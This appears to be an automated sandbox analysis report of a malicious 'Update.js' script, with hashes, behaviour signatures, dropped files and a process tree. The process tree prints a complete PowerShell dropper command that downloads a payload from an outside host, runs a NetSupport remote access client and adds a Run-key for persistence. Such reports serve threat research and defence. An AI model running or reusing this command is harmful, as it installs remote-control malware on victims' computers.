Resubmissions

08-10-2024 17:41

241008-v9rc3axdjq 8

08-10-2024 13:16

241008-qh3jsssdka 10

Analysis

  • max time kernel
    922s
  • max time network
    1190s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-10-2024 13:16

General

  • Target

    Update.js

  • Size

    3.9MB

  • MD5

    01d7daa58e16da2b30ac20fe57081bba

  • SHA1

    8213900420ed4c22b1e896acb53f99a5989cb2cd

  • SHA256

    a05933c299a81badef96fd575ff0f7d934c3edaf0f7478e897a2299f1ef8f11e

  • SHA512

    9a99fbf90fb7274cb0a1300c8052ee419258575b6202df9f78ed0c5dd0d5905cab63a92a96d426261257bead247b125bc05086f622589f3080abd53cddd14f64

  • SSDEEP

    49152:OCz4F9dM2furCz4F9dM2fuVCz4F9dM2furCz4F9dM2fuWCz4F9dM2furCz4F9dME:OkGgkGMkGgkGNkGgkG9

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://ggoryo.com/trade/da.php?8158

exe.dropper

https://ggoryo.com/trade/da.php?8158

Signatures

  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 14 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Update.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:4628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BCALRVYN='https://ggoryo.com/trade/da.php?8158';$NQCRPX=(New-Object System.Net.WebClient).DownloadString($BCALRVYN);$ISXTS=[System.Convert]::FromBase64String($NQCRPX);$asd = Get-Random -Minimum -5 -Maximum 12; $YNOK=[System.Environment]::GetFolderPath('ApplicationData')+'\RTIGINT'+$asd;if (!(Test-Path $YNOK -PathType Container)) { New-Item -Path $YNOK -ItemType Directory };$p=Join-Path $YNOK 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ISXTS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$YNOK)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $YNOK 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $YNOK -Force; $fd.attributes='Hidden';$s=$YNOK+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='MRNLCYZBPQP';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3732
      • C:\Users\Admin\AppData\Roaming\RTIGINT-1\client32.exe
        "C:\Users\Admin\AppData\Roaming\RTIGINT-1\client32.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3952
        • C:\Windows\SysWOW64\tar.exe
          "C:\Windows\SYSTEM32\tar.exe" -xf C:\Users\Public\baby.zip -C C:\Users\Public
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1816
        • C:\Users\Public\Babylon.exe
          "C:\Users\Public\Babylon.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:3584

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g21kiq3d.0kj.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\RTIGINT-1\HTCTL32.DLL

    Filesize

    320KB

    MD5

    c94005d2dcd2a54e40510344e0bb9435

    SHA1

    55b4a1620c5d0113811242c20bd9870a1e31d542

    SHA256

    3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

    SHA512

    2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

  • C:\Users\Admin\AppData\Roaming\RTIGINT-1\MSVCR100.dll

    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\RTIGINT-1\NSM.LIC

    Filesize

    195B

    MD5

    e9609072de9c29dc1963be208948ba44

    SHA1

    03bbe27d0d1ba651ff43363587d3d6d2e170060f

    SHA256

    dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747

    SHA512

    f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

  • C:\Users\Admin\AppData\Roaming\RTIGINT-1\PCICHEK.DLL

    Filesize

    18KB

    MD5

    104b30fef04433a2d2fd1d5f99f179fe

    SHA1

    ecb08e224a2f2772d1e53675bedc4b2c50485a41

    SHA256

    956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

    SHA512

    5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

  • C:\Users\Admin\AppData\Roaming\RTIGINT-1\PCICL32.dll

    Filesize

    3.6MB

    MD5

    d3d39180e85700f72aaae25e40c125ff

    SHA1

    f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

    SHA256

    38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

    SHA512

    471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

  • C:\Users\Admin\AppData\Roaming\RTIGINT-1\client32.exe

    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

  • C:\Users\Admin\AppData\Roaming\RTIGINT-1\client32.ini

    Filesize

    670B

    MD5

    15221731b8c78d255535a98220f55385

    SHA1

    917cba1d62dc16241700ac2027a67b62dbd03450

    SHA256

    b23705ddaf4dd0da82ea5c70f7b406f13529b624dfcf8ec2c9099c07de5b997d

    SHA512

    0883c5b8bd9865fa31614f7c8054144323dd4fc5acd73f7e1dec1782b1bdb2da7f7af4aa9bba76847eee42a566c5843b2f021accab477805babab89db6dccf03

  • C:\Users\Admin\AppData\Roaming\RTIGINT-1\pcicapi.dll

    Filesize

    32KB

    MD5

    34dfb87e4200d852d1fb45dc48f93cfc

    SHA1

    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

    SHA256

    2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

    SHA512

    f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

  • C:\Users\Admin\AppData\Roaming\RTIGINT-1\remcmdstub.exe

    Filesize

    62KB

    MD5

    6fca49b85aa38ee016e39e14b9f9d6d9

    SHA1

    b0d689c70e91d5600ccc2a4e533ff89bf4ca388b

    SHA256

    fedd609a16c717db9bea3072bed41e79b564c4bc97f959208bfa52fb3c9fa814

    SHA512

    f9c90029ff3dea84df853db63dace97d1c835a8cf7b6a6227a5b6db4abe25e9912dfed6967a88a128d11ab584663e099bf80c50dd879242432312961c0cfe622

  • C:\Users\Public\BException.dll

    Filesize

    142KB

    MD5

    a2d4928c9836812735b3516c6950a9ec

    SHA1

    01873285eec57b208fa2d4b71d06f176486538c8

    SHA256

    79ca108d5c51259d8fb38ed1cfcc5a70e9cf67a5954e52a4339b39ff04fa20c8

    SHA512

    d03964a2bb597bf0fdefb787de3b462010c4cd02d286b16587a03b5228553a307d1b8f472c312e0d8bb53f21570aa5b112d85193cf42b83ef33fb7905855eba7

  • C:\Users\Public\BabyServices.dll

    Filesize

    922KB

    MD5

    369c28e44083111798018294ec26bed7

    SHA1

    d93038b19ff4486e95b4de8c2a29d8320211d658

    SHA256

    0e04e2edd3ba0555b259001ed494689e82d87ef89655e47a0afbb804e7d4be63

    SHA512

    33f62bdf556675c92363cc6b9ba0b706d6208d6e8dae9ba89b753e60df2f19aa0cb0480157b180f31e2c4fde2f6244968a2c29e8745ad3014c19a2d991c8a3bf

  • C:\Users\Public\Babylon.exe

    Filesize

    2.4MB

    MD5

    a250242d10ac8c7850cc61ccbea4b427

    SHA1

    0c58d4bb9e0a04f466b50bfd1bfd32adac372d54

    SHA256

    b7441376afa9b03845c444faf2093067f8d99675ea4074a6418679b883a9a886

    SHA512

    9bbff45201b48c9894e6a53cedef7c5d2583a79326eec01149672173cf20545483cf9d769aa4a5de8b0146f363c270ef420b8ef574f26a1a1e645569fcd72a6e

  • C:\Users\Public\Dependency.raw

    Filesize

    318KB

    MD5

    781a921074043cf5793b59adb50f6af1

    SHA1

    0d078c5efa5583cea6497fd779db8308ffbf372c

    SHA256

    87c1a3dd63f08b62bf3d14b45d1cb9cb92727a86b32cb20dd002f07fbd6dac75

    SHA512

    abd62aa1a3bb936d0064e1092ab57b31c57f9947d9a7a2bd2b29357d4edbbfc31d4ab34ae91f4557dba9d99febc92c9bc4f0daed17955db7d4a68f42b35d5f93

  • C:\Users\Public\Rebex.Networking.dll

    Filesize

    3.4MB

    MD5

    8f8d800d5a43b7a28862ca1217e23e24

    SHA1

    a24a9e4c1f1f93bdaa37e6b76ec4576e2fbccc1d

    SHA256

    546565524f2d3a63eb66aa9615f290eb2fdc58a1befdc442fc7d3942edb1df69

    SHA512

    35ff0d8619b696aecb306ded54167e2f91b2efe2c89a60cc8422163d1e3ac98441a821e556b1c090c92800c36f873b1ac0017f55ea84dc5cd414f1e4b5f28d92

  • C:\Users\Public\baby.zip

    Filesize

    10.6MB

    MD5

    115879b6c22fada42ee0249de5896864

    SHA1

    0154d80635ef6f93e8adeeb8055400268ae830e6

    SHA256

    db5521f5d0025a847cb18f6b3479b57e9304921c3c1a8ac056174b9679319fa7

    SHA512

    d2ba08feac530fc07a167e2c56786e78c059790821b61a6135b820b40cbab206ead8cdfc4d154490693caac48d408092dd9a1faf3c4ae367cb35a7b37e2ca560

  • C:\Users\Public\libapp.dll

    Filesize

    3.2MB

    MD5

    59176157f5372608d65e905dd62a2f6f

    SHA1

    06ff829d2d32fa3ce062ce9436209e717c4a441f

    SHA256

    7c3fdb2347d74cbc4a0030579e54af1dace341633146b704c586f92a84b59eca

    SHA512

    e03c7688cfe2ff65d568307f74295ca4ab62c2a95e37c0157d90d6b3baabb42e18d664f09c7af7317e2df7066c2c587e03f0221ac06af8055dfea70faf310868

  • C:\Users\Public\liblept168.dll

    Filesize

    1.6MB

    MD5

    2941c9454b5902bb0aadf9432734cd57

    SHA1

    53776263c78b91c5bb9fbd8e82066893a5dd82bc

    SHA256

    9aa97345c029fdbb76cca5a8f81a8858da32d7e70744f3202e962e4a00058685

    SHA512

    3db9ed1e8b5f83b23d71c09c76c3f52046949b02796fd163b22031769959e93cd6721e141a661a8b1645b1cce03129b9a5e5f08ccdc179ca47a63a5ca731e37d

  • C:\Users\Public\libtesseract302.dll

    Filesize

    1.5MB

    MD5

    d93b75710b05b68f5a9d4a732bfb0324

    SHA1

    3df4e355deaf96147dd3927fc2d33b235cad7574

    SHA256

    5a29bb6e7f1be3b736f40fca1badef85c6e689238b85428fb4f604aaf0fb6ee8

    SHA512

    4a501a7c63699c190e0039a6d4ac0372acb9f43a9a93b6141f673343a7d969dbf3c3ecdb9689c7241d59d050cc9e548e6b040868f5be304762795370e797f6f5

  • C:\Users\Public\transitions\proxy.wav

    Filesize

    3.1MB

    MD5

    54cc32dbbca83c7efd137f3b9b729a23

    SHA1

    f6156eaea5b9d93ac88db9f33853791d66dd5349

    SHA256

    7c7cdb7547eca8bff489b85106d8a4e830b76681607634f43806f40dcdc5eb95

    SHA512

    dcbc88a480330122d54e2782f024446ac3e5566df40bf25e2c389c53413524f9639557d8b46b0c5f54116bce45b332aa10a13966a1249958945b636326d48076

  • C:\Users\Public\wpdecodejp.dll

    Filesize

    383KB

    MD5

    afcfc410aa9a67814bf4550e45b0c7de

    SHA1

    35aa10dbdb9c191ef4810c9f186a3575c6f4c9d4

    SHA256

    37b53bf337ec79e3713a30c238a2bd24cbb41134dd83117cbc1a5d97537e6700

    SHA512

    efd65d9d0f23790be9c17ed37176288d401672c95b2779456f9b54870a400684fbbab26389d7d75d94e6f964df3290a2b498f705e1f74d4b4b38b4d206eebbfd

  • memory/3584-146-0x0000000071920000-0x0000000071984000-memory.dmp

    Filesize

    400KB

  • memory/3584-162-0x0000000071920000-0x0000000071984000-memory.dmp

    Filesize

    400KB

  • memory/3584-159-0x0000000002DC0000-0x0000000002F19000-memory.dmp

    Filesize

    1.3MB

  • memory/3584-153-0x0000000002DC0000-0x0000000002F19000-memory.dmp

    Filesize

    1.3MB

  • memory/3584-135-0x0000000002690000-0x000000000277A000-memory.dmp

    Filesize

    936KB

  • memory/3584-155-0x0000000002DC0000-0x0000000002F19000-memory.dmp

    Filesize

    1.3MB

  • memory/3584-147-0x0000000002DC0000-0x0000000002F19000-memory.dmp

    Filesize

    1.3MB

  • memory/3732-18-0x00007FF9F22F0000-0x00007FF9F2DB2000-memory.dmp

    Filesize

    10.8MB

  • memory/3732-89-0x00007FF9F22F0000-0x00007FF9F2DB2000-memory.dmp

    Filesize

    10.8MB

  • memory/3732-19-0x00007FF9F22F0000-0x00007FF9F2DB2000-memory.dmp

    Filesize

    10.8MB

  • memory/3732-17-0x0000019F5AD60000-0x0000019F5AD82000-memory.dmp

    Filesize

    136KB

  • memory/3732-20-0x00007FF9F22F0000-0x00007FF9F2DB2000-memory.dmp

    Filesize

    10.8MB

  • memory/3732-22-0x0000019F42BC0000-0x0000019F42BCA000-memory.dmp

    Filesize

    40KB

  • memory/3732-8-0x00007FF9F22F3000-0x00007FF9F22F5000-memory.dmp

    Filesize

    8KB

  • memory/3732-23-0x0000019F5B240000-0x0000019F5B252000-memory.dmp

    Filesize

    72KB